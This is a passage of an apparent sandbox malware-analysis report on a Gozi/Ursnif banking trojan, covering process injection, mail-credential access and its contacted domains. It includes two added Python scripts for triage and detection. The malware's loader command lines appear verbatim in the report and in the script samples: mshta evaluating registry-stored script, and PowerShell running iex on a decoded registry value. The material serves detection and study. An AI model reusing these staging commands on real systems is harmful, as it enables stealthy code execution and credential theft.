Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\loaddll32.exe Thread register set: target process: 6996
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3472
Source: C:\Windows\System32\control.exe Thread register set: target process: 3472
Source: C:\Windows\System32\control.exe Thread register set: target process: 5244
Source: C:\Windows\explorer.exe Thread register set: target process: 4016
Source: C:\Windows\explorer.exe Thread register set: target process: 4288
Source: C:\Windows\explorer.exe Thread register set: target process: 4448
Source: C:\Windows\explorer.exe Thread register set: target process: 5436
Source: C:\Windows\explorer.exe Thread register set: target process: 984
Writes to foreign memory regions
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF7BEF712E0
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 290000
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF7BEF712E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: E9E000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFA9B851580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 2AB0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFA9B851580
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: E9C000
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 7FFA9B851580
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 3090000
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 7FFA9B851580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 46DA8F7000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2413CAD0000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 8DFD4F1000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1E766730000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 376E38B000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 209AB9B0000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 42F449C000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 165793D0000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: D1A98EB000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1EEFEFF0000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580
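The memory-write, allocation and thread-creation lines above describe a hop-by-hop injection chain (loaddll32.exe into control.exe, control.exe and powershell.exe into explorer.exe, explorer.exe into several RuntimeBroker.exe instances), with the same address 7FFA9B851580 written in every target and then used as the start address of the injected thread. The following Python script is an added triage example, not part of this Joe Sandbox report: it parses lines in the shape printed above, rebuilds the injection graph, lists every root-to-leaf chain, and reports thread start addresses that the injector also wrote to in more than one target process. The sample lines are copied from this section; the comparison on the low 32 bits assumes that the report's EIP column (9B851580) is the truncated form of the written address (7FFA9B851580), as the values above suggest.

```python
import re
from collections import defaultdict
from typing import Dict, List, NamedTuple, Set


class InjectEvent(NamedTuple):
    src: str    # process performing the write / allocation / thread creation
    kind: str   # "Memory written", "Thread created" or "Memory allocated"
    dst: str    # target process
    addr: int   # address written, allocated, or used as the thread start


# Matches the report's line shape; image paths in the report contain no spaces, so \S+ is enough.
LINE_RE = re.compile(
    r"^Source:\s+(?P<src>\S+)\s+(?P<kind>Memory written|Thread created|Memory allocated):\s+"
    r"(?P<dst>\S+)\s+(?:base|EIP):\s+(?P<addr>[0-9A-Fa-f]+)"
)


def parse_events(lines: List[str]) -> List[InjectEvent]:
    """Parse report lines of the shapes above; lines of any other shape are skipped."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            events.append(InjectEvent(m["src"], m["kind"], m["dst"], int(m["addr"], 16)))
    return events


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1]


def build_graph(events: List[InjectEvent]) -> Dict[str, Set[str]]:
    """Directed graph: injector -> set of processes it wrote into, allocated in or started threads in."""
    graph: Dict[str, Set[str]] = defaultdict(set)
    for ev in events:
        if ev.src != ev.dst:
            graph[ev.src].add(ev.dst)
    return dict(graph)


def injection_chains(graph: Dict[str, Set[str]]) -> List[List[str]]:
    """Every root-to-leaf path, longest first. A root is an injector nobody injected into."""
    targets = {d for dsts in graph.values() for d in dsts}
    roots = [s for s in graph if s not in targets]
    chains: List[List[str]] = []

    def walk(node: str, path: List[str]) -> None:
        nxt = [d for d in graph.get(node, ()) if d not in path]  # guard against cycles
        if not nxt:
            chains.append(path)
            return
        for d in sorted(nxt):
            walk(d, path + [d])

    for r in sorted(roots):
        walk(r, [r])
    return sorted(chains, key=len, reverse=True)


def hijacked_entrypoints(events: List[InjectEvent]) -> Dict[int, Set[str]]:
    """Thread start addresses that the injector also wrote to, seen in two or more targets.
    Only the low 32 bits are compared because the report prints EIP truncated
    (assumption: EIP 9B851580 is the low dword of base 7FFA9B851580)."""
    written: Dict[int, Set[str]] = defaultdict(set)
    started: Dict[int, Set[str]] = defaultdict(set)
    for ev in events:
        low = ev.addr & 0xFFFFFFFF
        if ev.kind == "Memory written":
            written[low].add(ev.dst)
        elif ev.kind == "Thread created":
            started[low].add(ev.dst)
    return {low: tgts & written[low] for low, tgts in started.items()
            if len(tgts & written[low]) >= 2}


# Constructed sample: a subset of this report's events, in the report's own line format.
SAMPLE_LINES = [
    r"Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 290000",
    r"Source: C:\Windows\System32\control.exe Memory allocated: C:\Windows\explorer.exe base: 3090000 protect: page execute and read and write",
    r"Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 7FFA9B851580",
    r"Source: C:\Windows\System32\control.exe Thread created: C:\Windows\explorer.exe EIP: 9B851580",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFA9B851580",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 9B851580",
    r"Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580",
    r"Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 9B851580",
    # a "Memory protected" line is deliberately included to show it is ignored by the parser
    r"Source: C:\Windows\System32\control.exe Memory protected: C:\Windows\explorer.exe base: 7FFA9B851580 protect: page execute read",
]

if __name__ == "__main__":
    evs = parse_events(SAMPLE_LINES)
    for chain in injection_chains(build_graph(evs)):
        print(" -> ".join(basename(p) for p in chain))
    for low, tgts in hijacked_entrypoints(evs).items():
        print(f"thread start 0x{low:08X} patched in: {', '.join(sorted(basename(t) for t in tgts))}")
```

On the sample lines the script yields the chain loaddll32.exe -> control.exe -> explorer.exe -> RuntimeBroker.exe, the shorter powershell.exe -> explorer.exe -> RuntimeBroker.exe chain, and a single shared entry point 0x9B851580 patched in both explorer.exe and RuntimeBroker.exe. A start address that is identical across processes and sits in the 0x7FFA... range is characteristic of a patched function inside a system DLL mapped at the same base in every process, which is consistent with the EAT/IAT/inline hook signatures listed at the top of the report; the script only surfaces the coincidence, it does not identify the function.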
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\l4vfe2li\l4vfe2li.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\3he3buld\3he3buld.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES47A8.tmp' 'c:\Users\user\AppData\Local\Temp\l4vfe2li\CSC4DA260FDB3A0492587313FAF41D3B261.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES5D63.tmp' 'c:\Users\user\AppData\Local\Temp\3he3buld\CSCBE830862A12C4DC4815ABE234EBA2CD.TMP'
Source: C:\Windows\System32\control.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: explorer.exe, 0000001D.00000000.364575168.0000000001640000.00000002.00000001.sdmp, RuntimeBroker.exe, 0000001E.00000000.371130415.000002413A990000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000020.00000002.502253927.000001E765260000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000022.00000002.503473567.00000209AA590000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000001D.00000000.364575168.0000000001640000.00000002.00000001.sdmp, RuntimeBroker.exe, 0000001E.00000000.371130415.000002413A990000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000020.00000002.502253927.000001E765260000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000022.00000002.503473567.00000209AA590000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 0000001D.00000000.364575168.0000000001640000.00000002.00000001.sdmp, RuntimeBroker.exe, 0000001E.00000000.371130415.000002413A990000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000020.00000002.502253927.000001E765260000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000022.00000002.503473567.00000209AA590000.00000002.00000001.sdmp Binary or memory string: SProgram Managerl
Source: explorer.exe, 0000001D.00000002.501859313.0000000001128000.00000004.00000020.sdmp Binary or memory string: ProgmanOMEa
Source: explorer.exe, 0000001D.00000000.364575168.0000000001640000.00000002.00000001.sdmp, RuntimeBroker.exe, 0000001E.00000000.371130415.000002413A990000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000020.00000002.502253927.000001E765260000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000022.00000002.503473567.00000209AA590000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 0000001D.00000000.364575168.0000000001640000.00000002.00000001.sdmp, RuntimeBroker.exe, 0000001E.00000000.371130415.000002413A990000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000020.00000002.502253927.000001E765260000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000022.00000002.503473567.00000209AA590000.00000002.00000001.sdmp Binary or memory string: Progmanlock
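The process-creation lines above show the loader chain end to end: mshta.exe runs an inline about:<hta:application> whose script is read from a registry value with WScript.Shell.RegRead, it spawns powershell.exe, which decodes a second registry value with Get-ItemProperty (gp) and feeds it to iex, that PowerShell compiles C# from %LOCALAPPDATA%\Temp with csc.exe (the "Suspicious Csc.exe Source File Folder" and "MSHTA Spawning Windows Shell" Sigma hits), and an nslookup of myip.opendns.com discovers the public IP. The following Python script is an added detection example, not part of the report and not a Joe Sandbox or Sigma artefact: it encodes those behaviours as rules over process-creation events and correlates them into the mshta -> powershell -> csc chain. The rule names are the author's own; the four malicious sample events reproduce this report's command lines, the two benign controls are constructed, and processes are identified by image path because the sample carries no PIDs (real telemetry would correlate on parent PID).

```python
import re
from typing import Callable, Dict, List, NamedTuple, Tuple


class ProcEvent(NamedTuple):
    parent: str    # image path of the creating process
    image: str     # image path of the created process
    cmdline: str   # command line of the created process


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _has(pattern: str, text: str) -> bool:
    return re.search(pattern, text, re.IGNORECASE) is not None


# Each rule mirrors one behaviour flagged in this report.
def mshta_inline_hta(ev: ProcEvent) -> bool:
    # Inline HTA whose real script is pulled from the registry via RegRead rather than a file on disk.
    return (basename(ev.image) == "mshta.exe"
            and _has(r"<hta:application>", ev.cmdline)
            and _has(r"\.regread\s*\(", ev.cmdline))


def mshta_spawns_shell(ev: ProcEvent) -> bool:
    # Equivalent of the Sigma hit "MSHTA Spawning Windows Shell".
    return (basename(ev.parent) == "mshta.exe"
            and basename(ev.image) in {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe"})


def powershell_registry_payload(ev: ProcEvent) -> bool:
    # iex over a value read with Get-ItemProperty (gp) from HKCU:\Software\AppDataLow.
    return (basename(ev.image) == "powershell.exe"
            and _has(r"\b(iex|invoke-expression)\b", ev.cmdline)
            and _has(r"\b(gp|get-itemproperty)\b", ev.cmdline)
            and _has(r"HKCU:\\?Software\\AppDataLow", ev.cmdline))


def csc_from_user_temp(ev: ProcEvent) -> bool:
    # Equivalent of "Suspicious Csc.exe Source File Folder": compiling out of %LOCALAPPDATA%\Temp.
    return (basename(ev.image) in {"csc.exe", "vbc.exe"}
            and _has(r"\\AppData\\Local\\Temp\\", ev.cmdline))


def external_ip_lookup(ev: ProcEvent) -> bool:
    return basename(ev.image) == "nslookup.exe" and "myip.opendns.com" in ev.cmdline.lower()


RULES: Dict[str, Callable[[ProcEvent], bool]] = {
    "mshta_inline_hta": mshta_inline_hta,
    "mshta_spawns_shell": mshta_spawns_shell,
    "powershell_registry_payload": powershell_registry_payload,
    "csc_from_user_temp": csc_from_user_temp,
    "external_ip_lookup": external_ip_lookup,
}


def evaluate(events: List[ProcEvent]) -> List[Tuple[str, str]]:
    """Return (rule name, child image basename) for every rule that fires on every event."""
    return [(name, basename(ev.image)) for ev in events for name, rule in RULES.items() if rule(ev)]


def registry_to_csc_chain(events: List[ProcEvent]) -> bool:
    """True when an mshta-spawned powershell that decoded a registry payload went on to
    compile from %TEMP%. Links parent to child by image path (simplification: no PIDs)."""
    stagers = {ev.image for ev in events if mshta_spawns_shell(ev) and powershell_registry_payload(ev)}
    return any(csc_from_user_temp(ev) and ev.parent in stagers for ev in events)


# Constructed sample events: the four malicious ones reproduce this report's command lines,
# the last two are benign controls that must not fire.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
MSHTA = r"C:\Windows\System32\mshta.exe"
CSC = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", MSHTA,
              r"""'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\Actidsrv'));if(!window.flag)close()</script>'"""),
    ProcEvent(MSHTA, PS,
              r"""'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))"""),
    ProcEvent(PS, CSC,
              r"""'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\l4vfe2li\l4vfe2li.cmdline'"""),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\nslookup.exe",
              "nslookup myip.opendns.com resolver1.opendns.com"),
    ProcEvent(r"C:\Windows\explorer.exe", PS, r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"),
    ProcEvent(r"C:\Program Files\MSBuild\MSBuild.exe", CSC, r"csc.exe /noconfig @C:\build\app\obj\Release\app.cmdline"),
]

if __name__ == "__main__":
    for name, image in evaluate(SAMPLE_EVENTS):
        print(f"{name:30s} {image}")
    print("registry-staged compile chain:", registry_to_csc_chain(SAMPLE_EVENTS))
```

The benign controls matter as much as the hits: a developer's PowerShell script and an MSBuild-driven csc.exe run share an image name with the malicious events and must stay silent, which is why the rules key on the inline HTA markup, the registry read under AppDataLow and the %TEMP% source folder rather than on the image names alone.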

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02824270 cpuid 0_2_02824270
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, 0_2_73CA19DA
Queries the installation date of Windows
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation (5 identical events)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0281190E CreateNamedPipeA,GetLastError,CloseHandle,GetLastError, 0_2_0281190E
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_73CA13E4 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 0_2_73CA13E4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0281B868 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 0_2_0281B868
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_73CA1371 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 0_2_73CA1371
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.271745722.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.271874843.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.354083922.0000020E4A350000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.271783751.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.406330368.000000000020E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.282144945.000000000363B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.358522767.0000022F9D7D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.370796430.0000000002810000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.502898897.000001E7666AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.340776035.0000000002850000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.510030791.000002413CA4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.271900204.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.271888074.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.511740839.000001657A17E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.511989031.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.508337116.00000209AC23E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.399209718.000001EEFF69E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000000.369710445.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.271814846.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.271908704.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.271854980.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.368074144.0000000002AC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 4396, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 6996, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7164, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4288, type: MEMORY
Tries to steal Mail credentials (via file access)
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.271745722.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.271874843.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.354083922.0000020E4A350000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.271783751.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.406330368.000000000020E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.282144945.000000000363B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.358522767.0000022F9D7D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.370796430.0000000002810000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.502898897.000001E7666AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.340776035.0000000002850000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.510030791.000002413CA4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.271900204.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.271888074.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.511740839.000001657A17E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.511989031.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.508337116.00000209AC23E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.399209718.000001EEFF69E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000000.369710445.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.271814846.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.271908704.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.271854980.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.368074144.0000000002AC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 4396, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 6996, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7164, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4288, type: MEMORY
Behavior Graph

Behavior Graph ID: 321067   Sample: earmarkavchd   Startdate: 20/11/2020   Architecture: WINDOWS   Score: 100

earmarkavchd (sample)
    DNS/IP: g.msn.com
    Signatures: Found malware configuration; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 12 other signatures
    started loaddll32.exe
        Signatures: Detected Gozi e-Banking trojan; Writes to foreign memory regions; Allocates memory in foreign processes; 5 other signatures
        started control.exe
            Signatures: Changes memory attributes in foreign processes to executable or writable; Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; 2 other signatures
            injected explorer.exe
                DNS/IP: 192.168.2.1 (unknown, unknown); c56.lepini.at; api3.lepini.at
                Signatures: Tries to steal Mail credentials (via file access); Changes memory attributes in foreign processes to executable or writable; Writes to foreign memory regions; 5 other signatures
                started cmd.exe
                    Signatures: Uses nslookup.exe to query domains
                    started nslookup.exe
                        DNS/IP: 222.222.67.208.in-addr.arpa; resolver1.opendns.com; myip.opendns.com
                    started conhost.exe
                injected RuntimeBroker.exe
                injected RuntimeBroker.exe
                4 other processes
    started mshta.exe
        Signatures: Suspicious powershell command line found
        started powershell.exe
            Dropped: C:\Users\user\AppData\...\l4vfe2li.cmdline (UTF-8); C:\Users\user\AppData\Local\...\3he3buld.0.cs (UTF-8)
            Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Compiles code for process injection (via .Net compiler)
            started csc.exe
                Dropped: C:\Users\user\AppData\Local\...\l4vfe2li.dll (PE32)
                started cvtres.exe
            started csc.exe
                Dropped: C:\Users\user\AppData\Local\...\3he3buld.dll (PE32)
                started cvtres.exe
            started conhost.exe
    started iexplore.exe
        started iexplore.exe
